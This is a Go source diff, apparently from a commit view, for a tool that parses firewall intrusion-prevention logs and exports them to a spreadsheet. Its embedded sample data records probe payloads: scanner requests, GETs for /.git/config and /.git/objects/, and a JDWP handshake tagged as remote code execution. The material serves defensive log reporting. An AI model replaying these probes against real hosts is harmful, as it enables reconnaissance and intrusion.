sheet.Cell("K" + strconv.Itoa(Con+v)).SetString(k.OutputJSON.(map[string]interface{})["Application"].(string))
|
||||||
|
sheet.Cell("L" + strconv.Itoa(Con+v)).SetString(k.OutputJSON.(map[string]interface{})["CVE"].(string))
|
||||||
|
sheet.Cell("M" + strconv.Itoa(Con+v)).SetString(k.OutputJSON.(map[string]interface{})["HttpHost"].(string))
|
||||||
|
sheet.Cell("N" + strconv.Itoa(Con+v)).SetString(k.OutputJSON.(map[string]interface{})["HttpFirstLine"].(string))
|
||||||
|
sheet.Cell("O" + strconv.Itoa(Con+v)).SetString(k.OutputJSON.(map[string]interface{})["Payload"].(string))
|
||||||
|
log.Println("开始插入今日数据:", v+Con, k.OutputJSON.(map[string]interface{})["SrcIPAddr"].(string))
|
||||||
|
}
|
||||||
|
// log.Println(Date_v(JsonStr).NTOP.LogPaging)
|
||||||
|
}
|
||||||
|
|
||||||
|
// 保存修改后的 Excel 文件
|
||||||
|
|
||||||
|
if err := ss.Validate(); err != nil {
|
||||||
|
log.Fatalf("验证文件时出错: %s", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
if err := ss.SaveToFile("防火墙安全事件.xlsx"); err != nil {
|
||||||
|
log.Fatalf("保存文件时出错: %s", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func Date_v(jsonStr string) *Person {
|
||||||
|
var person Person
|
||||||
|
err := json.Unmarshal([]byte(jsonStr), &person)
|
||||||
|
if err != nil {
|
||||||
|
log.Fatalf("JSON 解析失败: %v", err)
|
||||||
|
}
|
||||||
|
// 手动解析 InputJSON 和 OutputJSON 字段
|
||||||
|
for i := range person.NTOP.LogPaging {
|
||||||
|
logPaging := &person.NTOP.LogPaging[i]
|
||||||
|
|
||||||
|
// 解析 InputJSON
|
||||||
|
var inputJSON map[string]interface{}
|
||||||
|
err := json.Unmarshal([]byte(logPaging.InputJSON.(string)), &inputJSON)
|
||||||
|
if err != nil {
|
||||||
|
log.Fatalf("解析 InputJSON 失败: %v", err)
|
||||||
|
}
|
||||||
|
logPaging.InputJSON = inputJSON // 更新为解析后的数据
|
||||||
|
|
||||||
|
// 解析 OutputJSON
|
||||||
|
var outputJSON map[string]interface{}
|
||||||
|
err = json.Unmarshal([]byte(logPaging.OutputJSON.(string)), &outputJSON)
|
||||||
|
if err != nil {
|
||||||
|
log.Fatalf("解析 OutputJSON 失败: %v", err)
|
||||||
|
}
|
||||||
|
logPaging.OutputJSON = outputJSON // 更新为解析后的数据
|
||||||
|
}
|
||||||
|
// 输出结果
|
||||||
|
// log.Printf("解析结果: %+v\n", person.NTOP.LogPaging[4].OutputJSON.(map[string]interface{})["SrcPort"])
|
||||||
|
return &person
|
||||||
|
}
|
||||||
|
|
||||||
|
type Person struct {
|
||||||
|
NTOP NTOP `json:"NTOP"`
|
||||||
|
}
|
||||||
|
type NTOP struct {
|
||||||
|
LogPaging []LogPaging `json:"LogPaging"`
|
||||||
|
}
|
||||||
|
type LogPaging struct {
|
||||||
|
LogType string `json:"LogType"` //日志ID
|
||||||
|
ID string `json:"ID"`
|
||||||
|
UserID string `json:"UserID"`
|
||||||
|
PageNo string `json:"PageNo"` //页数
|
||||||
|
CountPerPage string `json:"CountPerPage"` //每页计数
|
||||||
|
TotalCounts string `json:"TotalCounts"` //总条数
|
||||||
|
InputJSON interface{} `json:"InputJSON"` //输入参数
|
||||||
|
OutputJSON interface{} `json:"OutputJSON"` //输出参数
|
||||||
|
TimeFilter TimeFilter `json:"TimeFilter"` //本次查询时间区间
|
||||||
|
}
|
||||||
|
|
||||||
|
type InputJSON struct {
|
||||||
|
SrcZoneName string `json:"SrcZoneName"` //源安全域
|
||||||
|
DestZoneName string `json:"DestZoneName"` //目的安全域
|
||||||
|
}
|
||||||
|
|
||||||
|
type OutputJSON struct {
|
||||||
|
SrcPort string `json:"SrcPort"` //源端口
|
||||||
|
DestPort string `json:"DestPort"` //目的端口
|
||||||
|
Action string `json:"Action"`
|
||||||
|
AttackCount string `json:"AttackCount"` //攻击计数
|
||||||
|
SrcVrfIndex string `json:"SrcVrfIndex"`
|
||||||
|
ThreatID string `json:"ThreatID"`
|
||||||
|
Severity string `json:"Severity"`
|
||||||
|
HddInfo string `json:"HddInfo"`
|
||||||
|
Application string `json:"Application"` //应用协议
|
||||||
|
ThreatName string `json:"ThreatName"` //威胁名称
|
||||||
|
SrcRegion string `json:"SrcRegion"` //源区域
|
||||||
|
DestRegion string `json:"DestRegion"` //目的区域
|
||||||
|
ThreatType string `json:"ThreatType"` //威胁类型 {入侵防御}
|
||||||
|
Time string `json:"Time"` //时间
|
||||||
|
ContextName string `json:"ContextName"` //上下文名称
|
||||||
|
Policy string `json:"Policy"` //策略
|
||||||
|
Protocol string `json:"Protocol"` //传输协议
|
||||||
|
SrcIPAddr string `json:"SrcIPAddr"` //源IP
|
||||||
|
User string `json:"User"` //用户
|
||||||
|
DestIPAddr string `json:"DestIPAddr"` //目的IP
|
||||||
|
SrcZoneName string `json:"SrcZoneName"` //源安全域
|
||||||
|
DestZoneName string `json:"DestZoneName"` //目的安全域
|
||||||
|
CVE string `json:"CVE"` //漏洞披露
|
||||||
|
MSB string `json:"MSB"`
|
||||||
|
BID string `json:"BID"`
|
||||||
|
RealIP string `json:"RealIP"`
|
||||||
|
CapturePktName string `json:"CapturePktName"`
|
||||||
|
HttpHost string `json:"HttpHost"` //host头
|
||||||
|
HttpFirstLine string `json:"HttpFirstLine"` //请求路径
|
||||||
|
Payload string `json:"Payload"` //请求数据
|
||||||
|
MethodName string `json:"MethodName"` //方法名称
|
||||||
|
MethodNameCN string `json:"MethodNameCN"` //方法名称中国(攻击类别)
|
||||||
|
MethodSubName string `json:"MethodSubName"` //方法子名称
|
||||||
|
MethodSubNameCN string `json:"MethodSubNameCN"` //方法子名称中国(具体攻击形式)
|
||||||
|
LoginUserName string `json:"LoginUserName"`
|
||||||
|
LoginPassword string `json:"LoginPassword"`
|
||||||
|
}
|
||||||
|
|
||||||
|
type TimeFilter struct {
|
||||||
|
StartTime string `json:"StartTime"`
|
||||||
|
EndTime string `json:"EndTime"`
|
||||||
|
}
|
||||||
@ -1,118 +1,36 @@
|
|||||||
package attackevent
|
package attackevent
|
||||||
|
|
||||||
import (
|
var JsonStr = `{
|
||||||
"encoding/json"
|
"NTOP":{
|
||||||
"log"
|
"LogPaging":
|
||||||
"strings"
|
[{"LogType":"1","ID":"1766","UserID":"65538","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":33432,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":24881,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Git 客户端命令执行漏洞(CVE-2014-9390)\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T23:42:32\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"45.144.212.139\",\"User\":\"45.144.212.139\",\"DestIPAddr\":\"121.30.199.80\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"CVE-2014-9390\",\"MSB\":\"\",\"BID\":\"BID-71732\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.80\",\"HttpFirstLine\":\"\/.git\/objects\/\",\"Payload\":\"GET \/.git\/objects\/ HTTP\/1.1\\\\0d\\\\0aHost: 121.30.199.80\\\\0d\\\\0aUser-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/76.0.3809.100 Safari\/537.36\\\\0d\\\\0aAccept-Charset: utf-8\\\\0d\\\\0aAccept-Encoding: gzip\\\\0d\\\\0aConnection: close\\\\0d\\\\0a\\\\0d\\\\0a\",\"MethodName\":\"Vulnerability\",\"MethodNameCN\":\"漏洞\",\"MethodSubName\":\"CommandInjection\",\"MethodSubNameCN\":\"命令注入\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
||||||
)
|
,{"LogType":"1","ID":"1766","UserID":"131074","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":39780,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T23:25:52\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"66.240.236.109\",\"User\":\"66.240.236.109\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.79\",\"HttpFirstLine\":\"\/\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
||||||
|
,{"LogType":"1","ID":"1766","UserID":"196610","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":26451,\"DestPort\":443,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":35764,\"Severity\":30,\"HddInfo\":false,\"Application\":\"general_tcp\",\"ThreatName\":\"CVE-2017-6639_Oracle_Java_Debug_Wire_远程调试漏洞\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T23:13:37\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"64.226.111.62\",\"User\":\"64.226.111.62\",\"DestIPAddr\":\"121.30.199.80\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"CVE-2017-6639\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\"\",\"HttpFirstLine\":\"\",\"Payload\":\"JDWP-Handshake\\\\00\\\\00\\\\00\\\\0b\\\\00\\\\00\\\\00\\\\01\\\\00\\\\01\\\\01\",\"MethodName\":\"Vulnerability\",\"MethodNameCN\":\"漏洞\",\"MethodSubName\":\"RemoteCodeExecution\",\"MethodSubNameCN\":\"远程代码执行\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
||||||
func Ceshi() {
|
,{"LogType":"1","ID":"1766","UserID":"262146","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":59201,\"DestPort\":16001,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T23:10:18\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"15.235.224.239\",\"User\":\"15.235.224.239\",\"DestIPAddr\":\"121.30.199.65\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.65\",\"HttpFirstLine\":\"\/\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
||||||
jsonStr := `{
|
,{"LogType":"1","ID":"1766","UserID":"327682","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":59201,\"DestPort\":16001,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T23:10:17\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"15.235.224.239\",\"User\":\"15.235.224.239\",\"DestIPAddr\":\"121.30.199.65\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.65\",\"HttpFirstLine\":\"\/\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
||||||
"NTOP":{
|
,{"LogType":"1","ID":"1766","UserID":"393218","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":58968,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":45845,\"Severity\":60,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"访问敏感文件.git_config通信流量\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T21:32:38\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"134.199.151.205\",\"User\":\"134.199.151.205\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.79\",\"HttpFirstLine\":\"\/.git\/config\",\"Payload\":\"GET \/.git\/config HTTP\/1.1\\\\0d\\\\0aHost: 121.30.199.79\\\\0d\\\\0aUser-agent: Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/81.0.4044.129 Safari\/537.36\\\\0d\\\\0aAccept-Encoding: gzip, deflate\\\\0d\\\\0aAccept: *\/*\\\\0d\\\\0aConnection: keep-alive\\\\0d\\\\0a\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"SensitiveInfo\",\"MethodSubNameCN\":\"敏感信息泄露\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
||||||
"LogPaging":
|
,{"LogType":"1","ID":"1766","UserID":"458754","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":50568,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":45845,\"Severity\":60,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"访问敏感文件.git_config通信流量\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T21:07:47\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"134.199.151.205\",\"User\":\"134.199.151.205\",\"DestIPAddr\":\"121.30.199.82\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.82\",\"HttpFirstLine\":\"\/.git\/config\",\"Payload\":\"GET \/.git\/config HTTP\/1.1\\\\0d\\\\0aHost: 121.30.199.82\\\\0d\\\\0aUser-agent: Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/81.0.4044.129 Safari\/537.36\\\\0d\\\\0aAccept-Encoding: gzip, deflate\\\\0d\\\\0aAccept: *\/*\\\\0d\\\\0aConnection: keep-alive\\\\0d\\\\0a\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"SensitiveInfo\",\"MethodSubNameCN\":\"敏感信息泄露\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
||||||
[{"LogType":"1","ID":"1766","UserID":"65538","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":33432,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":24881,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Git 客户端命令执行漏洞(CVE-2014-9390)\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T23:42:32\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"45.144.212.139\",\"User\":\"45.144.212.139\",\"DestIPAddr\":\"121.30.199.80\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"CVE-2014-9390\",\"MSB\":\"\",\"BID\":\"BID-71732\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.80\",\"HttpFirstLine\":\"\/.git\/objects\/\",\"Payload\":\"GET \/.git\/objects\/ HTTP\/1.1\\\\0d\\\\0aHost: 121.30.199.80\\\\0d\\\\0aUser-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/76.0.3809.100 Safari\/537.36\\\\0d\\\\0aAccept-Charset: utf-8\\\\0d\\\\0aAccept-Encoding: gzip\\\\0d\\\\0aConnection: close\\\\0d\\\\0a\\\\0d\\\\0a\",\"MethodName\":\"Vulnerability\",\"MethodNameCN\":\"漏洞\",\"MethodSubName\":\"CommandInjection\",\"MethodSubNameCN\":\"命令注入\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
,{"LogType":"1","ID":"1766","UserID":"524290","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":41287,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T19:02:09\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"15.235.224.238\",\"User\":\"15.235.224.238\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.79\",\"HttpFirstLine\":\"\/\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
||||||
,{"LogType":"1","ID":"1766","UserID":"131074","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":39780,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T23:25:52\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"66.240.236.109\",\"User\":\"66.240.236.109\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.79\",\"HttpFirstLine\":\"\/\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
,{"LogType":"1","ID":"1766","UserID":"589826","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":41287,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T19:02:08\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"15.235.224.238\",\"User\":\"15.235.224.238\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.79\",\"HttpFirstLine\":\"\/\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
||||||
,{"LogType":"1","ID":"1766","UserID":"196610","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":26451,\"DestPort\":443,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":35764,\"Severity\":30,\"HddInfo\":false,\"Application\":\"general_tcp\",\"ThreatName\":\"CVE-2017-6639_Oracle_Java_Debug_Wire_远程调试漏洞\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T23:13:37\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"64.226.111.62\",\"User\":\"64.226.111.62\",\"DestIPAddr\":\"121.30.199.80\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"CVE-2017-6639\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\"\",\"HttpFirstLine\":\"\",\"Payload\":\"JDWP-Handshake\\\\00\\\\00\\\\00\\\\0b\\\\00\\\\00\\\\00\\\\01\\\\00\\\\01\\\\01\",\"MethodName\":\"Vulnerability\",\"MethodNameCN\":\"漏洞\",\"MethodSubName\":\"RemoteCodeExecution\",\"MethodSubNameCN\":\"远程代码执行\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
,{"LogType":"1","ID":"1766","UserID":"655362","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":33620,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T18:45:40\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"4.156.21.82\",\"User\":\"4.156.21.82\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.79\",\"HttpFirstLine\":\"\/hudson\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
||||||
,{"LogType":"1","ID":"1766","UserID":"262146","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":59201,\"DestPort\":16001,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T23:10:18\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"15.235.224.239\",\"User\":\"15.235.224.239\",\"DestIPAddr\":\"121.30.199.65\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.65\",\"HttpFirstLine\":\"\/\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
